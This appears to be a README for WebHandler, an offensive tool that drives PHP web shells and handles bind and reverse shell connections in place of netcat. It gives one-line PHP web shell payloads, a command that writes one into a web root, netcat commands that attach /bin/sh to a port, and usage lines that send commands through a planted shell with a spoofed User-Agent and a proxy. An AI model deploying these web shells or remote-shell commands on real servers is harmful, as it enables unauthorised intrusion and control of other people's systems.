WebHandler
A handler for PHP system functions & also an alternative 'netcat' handler
Info
WebHandler tries to simulate a 'Linux bash prompt' to handle and process:
- PHP program execution functions _(e.g. `system`, `passthru`, `exec`, etc)_
- Bind shell connections
- Reserve shell connectionsAnother feature is to spoof the "User-Agent" field in the HTTP header. (--random-angent).
It also supports HTTP proxies (--proxy http://<ip>:<port>)
-
WebHandler works for POST and GET requests:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>
-
WebHandler is a replacement for netcat connections.
A example bind connection (e.g.
nc -lvvp 1234 -e /bin/sh)Normally the user would do:
netcat -l -p 1234nc -lvvp 1234
A example reverse connection (e.g.
nc 127.0.0.1 4321 -e /bin/sh)Normally the user would do:
netcat -l -p 4321nc -lvvp 4321
Usage
-
--Example file:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
-
--url is a required argument when sending either GET or POST requests (e.g. a bind 'web based PHP' connection):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
-
--listen is a required argument when working waiting connection (e.g. a reverse 'raw' connection):
python webhandler.py --listen 1234
Dependencies
If your Python's version < 2.7.x, then argparse is required
To install it run: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OR sudo pip --install argparse.
readline is optional. This module it used to provide elaborate line editing and history features
git is optional. This allows for the project to be kept up-to-date